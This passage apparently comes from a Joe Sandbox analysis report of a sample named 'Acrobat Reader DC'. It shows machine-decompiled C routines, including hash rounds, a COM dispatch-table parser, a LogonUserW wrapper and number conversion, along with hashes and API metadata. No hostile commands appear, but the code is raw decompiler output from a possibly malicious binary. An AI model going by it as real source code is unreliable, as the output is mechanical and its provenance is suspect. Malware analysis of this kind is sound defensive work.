                                  				asm("rol esi, 0x10");
                                  				_t746 = (_t482 ^ _t414 ^ _t314) + _v12 + _t627 + 0x1fa27cf8 + _t482;
                                  				asm("ror ecx, 0x9");
                                  				_t416 = (_t482 ^ _t746 ^ _t314) + _v64 + _t414 - 0x3b53a99b + _t746;
                                  				asm("rol eax, 0x6");
                                  				_t316 = (( !_t482 | _t416) ^ _t746) + _v72 + _t314 - 0xbd6ddbc + _t416;
                                  				asm("rol edx, 0xa");
                                  				_t484 = (( !_t746 | _t316) ^ _t416) + _v44 + _t482 + 0x432aff97 + _t316;
                                  				_t191 = _t746 - 0x546bdc59; // -1412096868
                                  				asm("rol esi, 0xf");
                                  				_t748 = (( !_t416 | _t484) ^ _t316) + _v16 + _t191 + _t484;
                                  				asm("ror ecx, 0xb");
                                  				_t418 = (( !_t316 | _t748) ^ _t484) + _v52 + _t416 - 0x36c5fc7 + _t748;
                                  				asm("rol eax, 0x6");
                                  				_t318 = (( !_t484 | _t418) ^ _t748) + _v24 + _t316 + 0x655b59c3 + _t418;
                                  				asm("rol edx, 0xa");
                                  				_t486 = (( !_t748 | _t318) ^ _t418) + _v60 + _t484 - 0x70f3336e + _t318;
                                  				asm("rol esi, 0xf");
                                  				_t750 = (( !_t418 | _t486) ^ _t318) + _v32 + _t748 - 0x100b83 + _t486;
                                  				asm("ror ecx, 0xb");
                                  				_t420 = (( !_t318 | _t750) ^ _t486) + _v68 + _t418 - 0x7a7ba22f + _t750;
                                  				asm("rol eax, 0x6");
                                  				_t320 = (( !_t486 | _t420) ^ _t750) + _v40 + _t318 + 0x6fa87e4f + _t420;
                                  				asm("rol edx, 0xa");
                                  				_t488 = (( !_t750 | _t320) ^ _t420) + _v12 + _t486 - 0x1d31920 + _t320;
                                  				asm("rol esi, 0xf");
                                  				_t752 = (( !_t420 | _t488) ^ _t320) + _v48 + _t750 - 0x5cfebcec + _t488;
                                  				asm("ror edi, 0xb");
                                  				_t693 = (( !_t320 | _t752) ^ _t488) + _v20 + _t420 + 0x4e0811a1 + _t752;
                                  				asm("rol eax, 0x6");
                                  				_t322 = (( !_t488 | _t693) ^ _t752) + _v56 + _t320 - 0x8ac817e + _t693;
                                  				asm("rol edx, 0xa");
                                  				_t490 = (( !_t752 | _t322) ^ _t693) + _v28 + _t488 - 0x42c50dcb + _t322;
                                  				_t436 = _a4;
                                  				asm("rol esi, 0xf");
                                  				_t754 = (( !_t693 | _t490) ^ _t322) + _v64 + _t752 + 0x2ad7d2bb + _t490;
                                  				 *((intOrPtr*)(_t436 + 0x34)) =  *((intOrPtr*)(_t436 + 0x34)) + _t322;
                                  				asm("ror eax, 0xb");
                                  				 *((intOrPtr*)(_t436 + 0x38)) = (( !_t322 | _t754) ^ _t490) + _v36 + _t693 - 0x14792c6f +  *((intOrPtr*)(_t436 + 0x38)) + _t754;
                                  				 *((intOrPtr*)(_t436 + 0x3c)) =  *((intOrPtr*)(_t436 + 0x3c)) + _t754;
                                  				 *((intOrPtr*)(_t436 + 0x40)) =  *((intOrPtr*)(_t436 + 0x40)) + _t490;
                                  				return E00412F40( &_v72, 0, 0x40);
                                  			}

































































































                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset
                                  • String ID:
                                  • API String ID: 2102423945-0
                                  • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                  • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                  • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                  • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00444FD2(void* __eflags, signed int _a4, signed int _a8) {
                                  				signed int* _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				int _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				void* __edi;
                                  				void* __esi;
                                  				int _t348;
                                  				signed int _t352;
                                  				char** _t358;
                                  				signed int _t359;
                                  				signed int _t360;
                                  				signed int _t364;
                                  				signed int* _t365;
                                  				signed int _t366;
                                  				signed int _t367;
                                  				signed int _t369;
                                  				signed int _t371;
                                  				signed int _t373;
                                  				signed int _t379;
                                  				intOrPtr _t383;
                                  				signed int _t385;
                                  				short _t386;
                                  				short _t389;
                                  				signed int _t394;
                                  				signed int _t408;
                                  				signed int _t409;
                                  				int _t433;
                                  				signed int _t435;
                                  				signed int* _t437;
                                  				signed int _t440;
                                  				signed int _t448;
                                  				signed int _t450;
                                  				signed int _t453;
                                  				signed int _t454;
                                  				signed int _t473;
                                  				signed int _t475;
                                  				signed int _t478;
                                  				signed int _t479;
                                  				intOrPtr _t480;
                                  				signed int _t481;
                                  				signed int _t497;
                                  				signed int _t501;
                                  				signed int _t502;
                                  				signed int _t514;
                                  				signed int _t516;
                                  				signed int* _t521;
                                  				short _t544;
                                  				WCHAR* _t548;
                                  				signed int _t549;
                                  				signed int _t553;
                                  				void* _t554;
                                  				void* _t555;
                                  				void* _t556;
                                  				void* _t558;
                                  				intOrPtr _t591;
                                  
                                  				_t558 = __eflags;
                                  				_t553 = _a4;
                                  				_t548 = _a8;
                                  				_t348 = lstrlenW(_t548);
                                  				_v28 = _t348;
                                  				_push( ~(0 | _t558 > 0x00000000) | (_t348 + 0x00000001) * 0x00000002);
                                  				 *((intOrPtr*)(_t553 + 4)) = E004115D7(_t548, _t553, _t558);
                                  				_t352 = 0;
                                  				_t555 = _t554 + 4;
                                  				_a4 = 2;
                                  				if(_v28 <= 0) {
                                  					L36:
                                  					if( *((intOrPtr*)(_t553 + 0x24)) != 0) {
                                  						_t82 =  &_a4;
                                  						 *_t82 = _a4 + 3;
                                  						_t591 =  *_t82;
                                  					}
                                  					_push( ~(0 | _t591 > 0x00000000) | _a4 * 0x00000004);
                                  					 *((intOrPtr*)(_t553 + 8)) = E004115D7(_t548, _t553, _t591);
                                  					_push( ~(0 | _t591 > 0x00000000) | _a4 * 0x0000001c);
                                  					_t358 = E004115D7(_t548, _t553, _t591);
                                  					 *(_t553 + 0xc) = _t358;
                                  					 *_t358 = L"InterfaceDispatch";
                                  					_t359 =  *(_t553 + 0xc);
                                  					_t549 = 0;
                                  					 *((intOrPtr*)(_t359 + 4)) = 0;
                                  					_t360 = _t359 | 0xffffffff;
                                  					 *( *(_t553 + 0xc) + 8) = _t360;
                                  					 *( *(_t553 + 0xc) + 0xc) = _t360;
                                  					 *((intOrPtr*)( *(_t553 + 0xc) + 0x10)) = 4;
                                  					 *((intOrPtr*)( *(_t553 + 0xc) + 0x14)) = 0;
                                  					 *((short*)( *(_t553 + 0xc) + 0x18)) = 1;
                                  					 *((short*)( *(_t553 + 0xc) + 0x1a)) = 0;
                                  					 *((intOrPtr*)( *(_t553 + 0xc) + 0x1c)) = 0;
                                  					 *((intOrPtr*)( *(_t553 + 0xc) + 0x20)) = 0;
                                  					 *((intOrPtr*)( *(_t553 + 0xc) + 0x24)) = 0;
                                  					 *( *(_t553 + 0xc) + 0x28) = _t360;
                                  					 *((intOrPtr*)( *(_t553 + 0xc) + 0x2c)) = 4;
                                  					 *((intOrPtr*)( *(_t553 + 0xc) + 0x30)) = 0;
                                  					 *((short*)( *(_t553 + 0xc) + 0x34)) = 2;
                                  					 *((short*)( *(_t553 + 0xc) + 0x36)) = 0x13;
                                  					_a8 = 2;
                                  					 *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)))) = 0;
                                  					_t556 = _t555 + 8;
                                  					 *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 4)) = 0;
                                  					_t592 =  *((intOrPtr*)(_t553 + 0x24));
                                  					if( *((intOrPtr*)(_t553 + 0x24)) != 0) {
                                  						 *( *(_t553 + 0xc) + 0x38) = L"QueryInterface";
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x40)) = 1;
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x44)) = 0;
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x48)) = 4;
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x4c)) = 2;
                                  						 *((short*)( *(_t553 + 0xc) + 0x50)) = 1;
                                  						_push(0x10);
                                  						_a8 = 5;
                                  						 *((short*)( *(_t553 + 0xc) + 0x52)) = 3;
                                  						 *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 8)) = E004115D7(0, _t553, _t592);
                                  						 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 8)) + 4)) = 0x48;
                                  						 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 8)) + 0xc)) = 0x4013;
                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 8)))) = 0;
                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 8)) + 8)) = 0;
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x3c)) =  *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 8));
                                  						 *( *(_t553 + 0xc) + 0x54) = L"AddRef";
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x58)) = 0;
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x5c)) = 2;
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x60)) = 1;
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x64)) = 4;
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x68)) = 0;
                                  						 *((short*)( *(_t553 + 0xc) + 0x6c)) = 1;
                                  						 *((short*)( *(_t553 + 0xc) + 0x6e)) = 0x13;
                                  						 *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 0xc)) = 0;
                                  						 *( *(_t553 + 0xc) + 0x70) = L"Release";
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x74)) = 0;
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x78)) = 3;
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x7c)) = 2;
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x80)) = 4;
                                  						 *((intOrPtr*)( *(_t553 + 0xc) + 0x84)) = 0;
                                  						 *((short*)( *(_t553 + 0xc) + 0x88)) = 1;
                                  						 *((short*)( *(_t553 + 0xc) + 0x8a)) = 0x13;
                                  						_t556 = _t556 + 4;
                                  						 *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 0x10)) = 0;
                                  					}
                                  					_t364 =  *((intOrPtr*)(_t553 + 4));
                                  					_v8 = _t549;
                                  					_v28 = _t364;
                                  					_v24 = _t364;
                                  					_v20 = _t549;
                                  					if(0 <= _t549) {
                                  						L73:
                                  						_push(8);
                                  						_t365 = E004115D7(_t549, _t553, _t596);
                                  						 *(_t553 + 0x10) = _t365;
                                  						_t365[1] = _a4;
                                  						_t366 =  *(_t553 + 0xc);
                                  						 *( *(_t553 + 0x10)) = _t366;
                                  						return _t366;
                                  					} else {
                                  						_t367 = _a8;
                                  						_t549 = _t367 * 8 - _t367 + _t367 * 8 - _t367 + _t367 * 8 - _t367 + _t367 * 8 - _t367;
                                  						_a8 = _t367 * 4;
                                  						_t433 = _v28;
                                  						_v32 = _t367 + 0xfffffffe;
                                  						_t369 = _v20;
                                  						do {
                                  							_t497 =  *(_t433 + _t369 * 2) & 0x0000ffff;
                                  							if(_t497 != 0x7c) {
                                  								__eflags = _t497 - 0xa;
                                  								if(_t497 == 0xa) {
                                  									L47:
                                  									 *(_t433 + _t369 * 2) = 0;
                                  									 *((intOrPtr*)(_t549 +  *(_t553 + 0xc))) = _v24;
                                  									_t371 = _v32;
                                  									_t435 = _t371 + 1;
                                  									 *((intOrPtr*)( *(_t553 + 0xc) + _t549 + 8)) = _t435;
                                  									_v36 = _t435;
                                  									 *((intOrPtr*)( *(_t553 + 0xc) + _t549 + 0xc)) = _t371;
                                  									_t437 = _v8;
                                  									 *((short*)( *(_t553 + 0xc) + _t549 + 0x18)) = 1;
                                  									_t501 = 0;
                                  									_t373 = 0;
                                  									_v12 = 0;
                                  									__eflags =  *_t437;
                                  									if( *_t437 == 0) {
                                  										L55:
                                  										_v16 = _t501;
                                  										_t502 = 0;
                                  										__eflags = _t373;
                                  										if(__eflags <= 0) {
                                  											L61:
                                  											E00434CC9(_t437, __eflags, _v8,  *(_t553 + 0xc) + _t549 + 0x10,  *(_t553 + 0xc) + _t549 + 0x1a);
                                  											_t379 = _v12;
                                  											 *( *(_t553 + 0xc) + _t549 + 0x14) = _t379;
                                  											__eflags = _t379;
                                  											if(__eflags == 0) {
                                  												 *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t553 + 8)))) = 0;
                                  												 *((intOrPtr*)( *(_t553 + 0xc) + _t549 + 4)) = 0;
                                  												L71:
                                  												_t440 = _v20;
                                  												_a8 = _a8 + 4;
                                  												_v32 = _v36;
                                  												_t369 = _t440;
                                  												_t433 = _v28;
                                  												_t549 = _t549 + 0x1c;
                                  												__eflags = _t549;
                                  												_v24 = _v28 + 2 + _t440 * 2;
                                  												goto L72;
                                  											}
                                  											_push( ~(0 | __eflags > 0x00000000) | _t379 * 0x00000008);
                                  											_t383 = E004115D7(_t549, _t553, __eflags);
                                  											_t556 = _t556 + 4;
                                  											__eflags = _v16;
                                  											 *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t553 + 8)))) = _t383;
                                  											if(_v16 == 0) {
                                  												L69:
                                  												 *((intOrPtr*)( *(_t553 + 0xc) + _t549 + 4)) =  *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t553 + 8))));
                                  												goto L71;
                                  											}
                                  											_t448 = _v16;
                                  											__eflags =  *_t448;
                                  											_v24 = 0;
                                  											_t385 = _t448;
                                  											_v32 = 0;
                                  											if(__eflags == 0) {
                                  												L68:
                                  												_t386 = E00434C09(_t448, __eflags, _t385);
                                  												_t450 = _v24;
                                  												 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + _a8)) + 4 + _t450 * 8)) = _t386;
                                  												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + _a8)) + _t450 * 8)) = 0;
                                  												goto L69;
                                  											}
                                  											_t514 = _t448;
                                  											_v12 = _t448;
                                  											do {
                                  												__eflags =  *_t514 - 0x3b;
                                  												if(__eflags == 0) {
                                  													 *_v12 = 0;
                                  													_t389 = E00434C09(0, __eflags, _t385);
                                  													_t453 = _v24;
                                  													 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + _a8)) + 4 + _t453 * 8)) = _t389;
                                  													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + _a8)) + _t453 * 8)) = 0;
                                  													_t385 = _v12 + 2;
                                  													_t454 = _t453 + 1;
                                  													__eflags = _t454;
                                  													_v24 = _t454;
                                  													_t448 = _v16;
                                  												}
                                  												_t516 = _v32 + 1;
                                  												__eflags =  *((short*)(_t448 + _t516 * 2));
                                  												_v32 = _t516;
                                  												_t514 = _t448 + _t516 * 2;
                                  												_v12 = _t514;
                                  											} while (__eflags != 0);
                                  											goto L68;
                                  										} else {
                                  											goto L56;
                                  										}
                                  										while(1) {
                                  											L56:
                                  											__eflags =  *((short*)(_t437 + _t502 * 2)) - 0x3b;
                                  											if( *((short*)(_t437 + _t502 * 2)) == 0x3b) {
                                  												break;
                                  											}
                                  											_t502 = _t502 + 1;
                                  											__eflags = _t502 - _t373;
                                  											if(__eflags < 0) {
                                  												continue;
                                  											}
                                  											goto L61;
                                  										}
                                  										__eflags =  *(_t437 + 2 + _t502 * 2);
                                  										 *((short*)(_t437 + _t502 * 2)) = 0;
                                  										_t394 = _t437 + 2 + _t502 * 2;
                                  										if(__eflags != 0) {
                                  											_v16 = _t394;
                                  										}
                                  										goto L61;
                                  									}
                                  									_t521 = _t437;
                                  									do {
                                  										__eflags =  *_t521 - 0x3b;
                                  										if( *_t521 == 0x3b) {
                                  											__eflags = _t521[0];
                                  											if(_t521[0] == 0) {
                                  												__eflags = 0;
                                  												 *_t521 = 0;
                                  												_t437 = _v8;
                                  											} else {
                                  												_v12 = _v12 + 1;
                                  											}
                                  										}
                                  										_t373 = _t373 + 1;
                                  										__eflags =  *(_t437 + _t373 * 2);
                                  										_t521 = _t437 + _t373 * 2;
                                  									} while ( *(_t437 + _t373 * 2) != 0);
                                  									_t501 = 0;
                                  									__eflags = 0;
                                  									goto L55;
                                  								}
                                  								__eflags = _t497;
                                  								if(__eflags != 0) {
                                  									goto L72;
                                  								}
                                  								goto L47;
                                  							}
                                  							 *(_t433 + _t369 * 2) = 0;
                                  							_v8 = _t433 + 2 + _t369 * 2;
                                  							L72:
                                  							_t369 = _t369 + 1;
                                  							_v20 = _t369;
                                  							_t596 = _t369;
                                  						} while (_t369 < 0);
                                  						goto L73;
                                  					}
                                  				} else {
                                  					do {
                                  						if(_t548[_t352] != 0x20) {
                                  							L4:
                                  							_t473 = _t548[_t352] & 0x0000ffff;
                                  							if(_t473 == 0x20) {
                                  								L6:
                                  								_a4 = _a4 + 1;
                                  								 *((short*)( *((intOrPtr*)(_t553 + 4)))) = 0x7c;
                                  								_t408 = 1;
                                  								if(_t548[_t352] != 0x20) {
                                  									L8:
                                  									_t475 = _t548[_t352] & 0x0000ffff;
                                  									if(_t475 == 0x20) {
                                  										L11:
                                  										 *( *((intOrPtr*)(_t553 + 4)) + _t408 * 2) = 0x3b;
                                  										_t409 = _t408 + 1;
                                  										if(_t548[_t352] != 0x20) {
                                  											L13:
                                  											if(_t548[_t352] == 0x28) {
                                  												_t352 = _t352 + 1;
                                  											}
                                  											if(_t548[_t352] != 0x20) {
                                  												L18:
                                  												_a8 = 1;
                                  												do {
                                  													if(_t548[_t352] != 0x20) {
                                  														L21:
                                  														_t478 = _t548[_t352] & 0x0000ffff;
                                  														if(_t478 == 0x3b) {
                                  															L27:
                                  															_t479 = 0;
                                  															L28:
                                  															if(_t548[_t352] != 0x20) {
                                  																goto L30;
                                  															} else {
                                  																goto L29;
                                  															}
                                  															do {
                                  																L29:
                                  																_t352 = _t352 + 1;
                                  															} while (_t548[_t352] == 0x20);
                                  															goto L30;
                                  														} else {
                                  															goto L22;
                                  														}
                                  														do {
                                  															L22:
                                  															if(_t478 != 0x20) {
                                  																L25:
                                  																_t481 = _t548[_t352] & 0x0000ffff;
                                  																if(_t481 == 0x29) {
                                  																	_t479 = 0;
                                  																	_a8 = 0;
                                  																	_t352 = _t352 + 1;
                                  																	goto L28;
                                  																}
                                  																goto L26;
                                  															}
                                  															do {
                                  																_t352 = _t352 + 1;
                                  															} while (_t548[_t352] == 0x20);
                                  															goto L25;
                                  															L26:
                                  															_t352 = _t352 + 1;
                                  															 *( *((intOrPtr*)(_t553 + 4)) + _t409 * 2) = _t481;
                                  															_t478 = _t548[_t352] & 0x0000ffff;
                                  															_t409 = _t409 + 1;
                                  														} while (_t478 != 0x3b);
                                  														goto L27;
                                  													} else {
                                  														goto L20;
                                  													}
                                  													do {
                                  														L20:
                                  														_t352 = _t352 + 1;
                                  													} while (_t548[_t352] == 0x20);
                                  													goto L21;
                                  													L30:
                                  													_t480 =  *((intOrPtr*)(_t553 + 4));
                                  													_t544 = 0xa;
                                  													if(_a8 != _t479) {
                                  														_t544 = 0x3b;
                                  													}
                                  													 *((short*)(_t480 + _t409 * 2)) = _t544;
                                  													_t409 = _t409 + 1;
                                  													if(_t548[_t352] == 0x3b) {
                                  														_t352 = _t352 + 1;
                                  													}
                                  												} while (_a8 == 1);
                                  												goto L35;
                                  											} else {
                                  												do {
                                  													_t352 = _t352 + 1;
                                  												} while (_t548[_t352] == 0x20);
                                  												goto L18;
                                  											}
                                  										} else {
                                  											goto L12;
                                  										}
                                  										do {
                                  											L12:
                                  											_t352 = _t352 + 1;
                                  										} while (_t548[_t352] == 0x20);
                                  										goto L13;
                                  									}
                                  									while(_t475 != 0x28) {
                                  										_t352 = _t352 + 1;
                                  										 *( *((intOrPtr*)(_t553 + 4)) + _t408 * 2) = _t475;
                                  										_t475 = _t548[_t352] & 0x0000ffff;
                                  										_t408 = _t408 + 1;
                                  										if(_t475 != 0x20) {
                                  											continue;
                                  										}
                                  										goto L11;
                                  									}
                                  									goto L11;
                                  								} else {
                                  									goto L7;
                                  								}
                                  								do {
                                  									L7:
                                  									_t352 = _t352 + 1;
                                  								} while (_t548[_t352] == 0x20);
                                  								goto L8;
                                  							} else {
                                  								goto L5;
                                  							}
                                  							do {
                                  								L5:
                                  								_t352 = _t352 + 1;
                                  								 *( *((intOrPtr*)(_t553 + 4)) + _t409 * 2) = _t473;
                                  								_t473 = _t548[_t352] & 0x0000ffff;
                                  								_t409 = _t409 + 1;
                                  							} while (_t473 != 0x20);
                                  							goto L6;
                                  						} else {
                                  							goto L3;
                                  						}
                                  						do {
                                  							L3:
                                  							_t352 = _t352 + 1;
                                  						} while (_t548[_t352] == 0x20);
                                  						goto L4;
                                  						L35:
                                  					} while (_t352 < _v28);
                                  					goto L36;
                                  				}
                                  			}
                                  0x00445029
                                  0x00445029
                                  0x00445029
                                  0x0044502a
                                  0x00000000
                                  0x0044514f
                                  0x0044514f
                                  0x00000000
                                  0x00445022

                                  APIs
                                  • lstrlenW.KERNEL32(?), ref: 00444FE2
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloclstrlen
                                  • String ID:
                                  • API String ID: 3912106968-0
                                  • Opcode ID: bc9b0ddbf4b5e781b20acb7ddcbfad4671bbbf65b13e500264cab2747784ff8c
                                  • Instruction ID: 2480d25d2fe0455ab98e3fcd8ca22477dbce4471f789c2aae3ed6ffbbcb8a03f
                                  • Opcode Fuzzy Hash: bc9b0ddbf4b5e781b20acb7ddcbfad4671bbbf65b13e500264cab2747784ff8c
                                  • Instruction Fuzzy Hash: 89222B74A00A059FDB24CF19C080A6AF7F1FF98314F24C55ED85A8B7A6D775E892CB84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00436CD7(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, signed char _a16, HANDLE* _a20) {
                                  				signed int _t11;
                                  
                                  				_t11 = LogonUserW(_a4, _a8, _a12, (_a16 & 0x00000002 | 0x00000004) >> 1, 0, _a20);
                                  				asm("sbb eax, eax");
                                  				return  ~( ~_t11);
                                  			}




                                  0x00436cf9
                                  0x00436d01
                                  0x00436d06

                                  APIs
                                  • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LogonUser
                                  • String ID:
                                  • API String ID: 1244722697-0
                                  • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                  • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                  • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                  • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E0042200C(char* _a4, intOrPtr _a8, signed int _a12) {
                                  				unsigned int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				unsigned int* _t82;
                                  				signed int _t83;
                                  				unsigned int _t84;
                                  				unsigned int _t88;
                                  				signed int _t91;
                                  				signed int _t93;
                                  				unsigned int _t95;
                                  				unsigned int _t97;
                                  				signed int _t99;
                                  				signed int _t101;
                                  				signed int _t104;
                                  				signed int _t108;
                                  				unsigned int _t116;
                                  				unsigned int _t117;
                                  				unsigned int _t119;
                                  				signed int _t121;
                                  				signed int _t122;
                                  				unsigned int _t125;
                                  				unsigned int _t127;
                                  				unsigned int _t129;
                                  				unsigned int _t140;
                                  				intOrPtr _t141;
                                  				char _t144;
                                  				void* _t145;
                                  
                                  				_t82 = _a12;
                                  				_t83 = 0;
                                  				_v8 = 0x404e;
                                  				 *_t82 = 0;
                                  				_t82[1] = 0;
                                  				_t82[2] = 0;
                                  				if(_a8 <= 0) {
                                  					L27:
                                  					if(_t82[2] != _t83) {
                                  						L31:
                                  						_t122 = _t82[2];
                                  						if((_t122 & 0x00008000) != 0) {
                                  							L34:
                                  							_t82[2] = _v8;
                                  							return _t82;
                                  						}
                                  						_t91 = _t82[1];
                                  						do {
                                  							_t84 =  *_t82;
                                  							_v8 = _v8 + 0xffff;
                                  							_t122 = _t122 + _t122 | _t91 >> 0x0000001f;
                                  							_t91 = _t91 + _t91 | _t84 >> 0x0000001f;
                                  							 *_t82 = _t84 + _t84;
                                  							_t82[1] = _t91;
                                  							_t82[2] = _t122;
                                  						} while ((_t122 & 0x00008000) == 0);
                                  						goto L34;
                                  					}
                                  					_t108 = _t82[1];
                                  					do {
                                  						_t93 =  *_t82;
                                  						_v8 = _v8 + 0xfff0;
                                  						_t125 = _t108 >> 0x10;
                                  						_t108 = _t108 << 0x00000010 | _t93 >> 0x00000010;
                                  						_t82[1] = _t108;
                                  						 *_t82 = _t93 << 0x10;
                                  					} while (_t125 == _t83);
                                  					_t82[2] = _t125;
                                  					goto L31;
                                  				} else {
                                  					_t95 = 0;
                                  					_a12 = 0;
                                  					do {
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t127 = _t95 + _t95;
                                  						_t97 = _t83 + _t83 | _t95 >> 0x0000001f;
                                  						_a12 = _a12 & 0x00000000;
                                  						_v12 = _t127;
                                  						_t99 = _t97 + _t97 | _t127 >> 0x0000001f;
                                  						_t129 = _t99;
                                  						_v12 = _t99;
                                  						_t140 = _v12 + _v12;
                                  						_t101 = (_a12 + _a12 | _t83 >> 0x0000001f) + (_a12 + _a12 | _t83 >> 0x0000001f) | _t97 >> 0x0000001f;
                                  						_t116 = _v28 + _t140;
                                  						 *_t82 = _t140;
                                  						_t82[1] = _t129;
                                  						_t82[2] = _t101;
                                  						if(_t116 < _t140 || _t116 < _v28) {
                                  							_a12 = 1;
                                  						}
                                  						 *_t82 = _t116;
                                  						if(_a12 != 0) {
                                  							_t147 = _v12;
                                  							_a12 = _a12 & 0x00000000;
                                  							_t26 = _t147 + 1; // 0x1
                                  							_t129 = _t26;
                                  							if(_t129 < _v12 || _t129 < 1) {
                                  								_a12 = 1;
                                  							}
                                  							_t82[1] = _t129;
                                  							if(_a12 != 0) {
                                  								_t101 = _t101 + 1;
                                  								_t82[2] = _t101;
